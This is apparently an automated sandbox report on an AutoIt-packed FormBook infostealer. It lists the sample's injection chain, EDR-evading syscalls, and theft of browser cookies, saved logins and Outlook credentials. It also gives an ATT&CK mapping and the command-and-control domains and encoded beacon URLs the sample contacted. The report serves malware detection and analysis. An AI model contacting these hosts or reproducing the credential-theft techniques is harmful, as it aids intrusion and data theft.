            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\makecab.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: NULL target: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: NULL target: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\makecab.exeThread register set: target process: 7772Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\makecab.exeThread APC queued: target process: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: A3A008Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008D8C93 LogonUserW,0_2_008D8C93
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_00883B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00883B4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_00884A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00884A35
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E4EC9 mouse_event,0_2_008E4EC9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"Jump to behavior
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exeProcess created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008D81F7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_008E4C03
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, rULxYvbAFLatPN.exe, 00000005.00000002.4100251548.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000000.1906158257.00000000010D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: rULxYvbAFLatPN.exe, 00000005.00000002.4100251548.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000000.1906158257.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100424916.0000000000E70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: rULxYvbAFLatPN.exe, 00000005.00000002.4100251548.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000000.1906158257.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100424916.0000000000E70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: rULxYvbAFLatPN.exe, 00000005.00000002.4100251548.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000000.1906158257.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100424916.0000000000E70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008A886B cpuid 0_2_008A886B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_008B50D7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008C2230 GetUserNameW,0_2_008C2230
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_008B418A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_00884AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00884AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\makecab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeBinary or memory string: WIN_81
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeBinary or memory string: WIN_XP
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeBinary or memory string: WIN_XPe
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeBinary or memory string: WIN_VISTA
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeBinary or memory string: WIN_7
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeBinary or memory string: WIN_8
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_008F6596
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_008F6A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1474004 Sample: SecuriteInfo.com.Trojan-Dow... Startdate: 16/07/2024 Architecture: WINDOWS Score: 100 28 www.rtpdewata4d-16.xyz 2->28 30 www.quixaclienti.com 2->30 32 22 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 rULxYvbAFLatPN.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 makecab.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 rULxYvbAFLatPN.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rtpdewata4d-16.xyz 104.21.89.46, 49770, 49771, 49772 CLOUDFLARENETUS United States 22->34 36 www.quiluxx.top 203.161.41.205, 49758, 49759, 49760 VNPT-AS-VNVNPTCorpVN Malaysia 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe37%ReversingLabsWin32.Trojan.AutoitInject
            SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe30%VirustotalBrowse
            SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            kundalisathi.com0%VirustotalBrowse
            mysticriverpath.com0%VirustotalBrowse
            kera333.org0%VirustotalBrowse
            www.focusonsocials.com0%VirustotalBrowse
            bearclaw.bot0%VirustotalBrowse
            quixaclienti.com0%VirustotalBrowse
            www.itsjojosiwas.com0%VirustotalBrowse
            www.quiluxx.top1%VirustotalBrowse
            www.onlandtoy.com0%VirustotalBrowse
            www.bb58cc.com0%VirustotalBrowse
            www.mysticriverpath.com0%VirustotalBrowse
            www.quixaclienti.com0%VirustotalBrowse
            www.lmsforsme.com0%VirustotalBrowse
            www.kera333.org1%VirustotalBrowse
            www.kundalisathi.com0%VirustotalBrowse
            www.bearclaw.bot0%VirustotalBrowse
            www.quests-galxe.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://connect.facebook.net/en_US/fbevents.js0%URL Reputationsafe
            https://schema.org0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://gmpg.org/xfn/110%URL Reputationsafe
            https://yoast.com/wordpress/plugins/seo/0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/data.min.js?ver=dc5f255634f3da29c8d50%Avira URL Cloudsafe
            http://www.onlandtoy.com/feed/0%Avira URL Cloudsafe
            http://www.onlandtoy.com/sample-page/0%Avira URL Cloudsafe
            http://www.mysticriverpath.com/6vu8/?UbV=9BQQ4LaVGcGIAegoNYy4BANrrk0FTQnfEPkS9PLUef2OP02gFBPJINGmLbjvn2PiRjYvhByaYI3HRuE2zbw60OnBrR/0yXqwb0H4BL8PQO8YxsUyAjYVuYA=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/refund_returns/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.rtpdewata4d-16.xyz/1mac/?UbV=vFCnEL2gmua2cn7cu+7uA1zrn4XuDHvsitE9TDncytOkj3MvcAAJscub939fSKqOURYthMBxIAmeZUaSv4+xK96qNWaFi0LmQ135fUkfGeU9K1xxgFotmEw=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            http://www.bearclaw.bot/f6em/?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/?s=0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/product-category/armen-living/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-settings.js?ver=0%Avira URL Cloudsafe
            https://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq40%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react-dom.min.js?ver=18.2.00%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/ie-fallback.css0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-json/0%Avira URL Cloudsafe
            http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff0%Avira URL Cloudsafe
            http://www.onlandtoy.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution-blo0%Avira URL Cloudsafe
            http://www.onlandtoy.com/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/product-category/pferd/0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/redux-routine.min.js?ver=0be1b2a6a79703e285310%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/url.min.js?ver=b4979979018b684be2090%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-includes/js/dist/keycodes.min.js?ver=3460bd0fac9859d6886c0%Avira URL Cloudsafe
            http://www.itsjojosiwas.com/0koa/?UbV=mkhz803NSe67VDi/XqoOvDTg0lhLFFwDmFAH6HAD7lWiJHUqLX0wanSTKUh9Wz+qOKuxLFQRu1GlWT2p2cyKlA2Zual+9OKI76CIESdTTdJvOpGtX0Yw5/M=&Y4gp=mlltcrRxcL0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/them0%Avira URL Cloudsafe
            http://www.onlandtoy.com0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-middlewar0%Avira URL Cloudsafe
            https://www.itsjojosiwas.com/my-account/0%Avira URL Cloudsafe
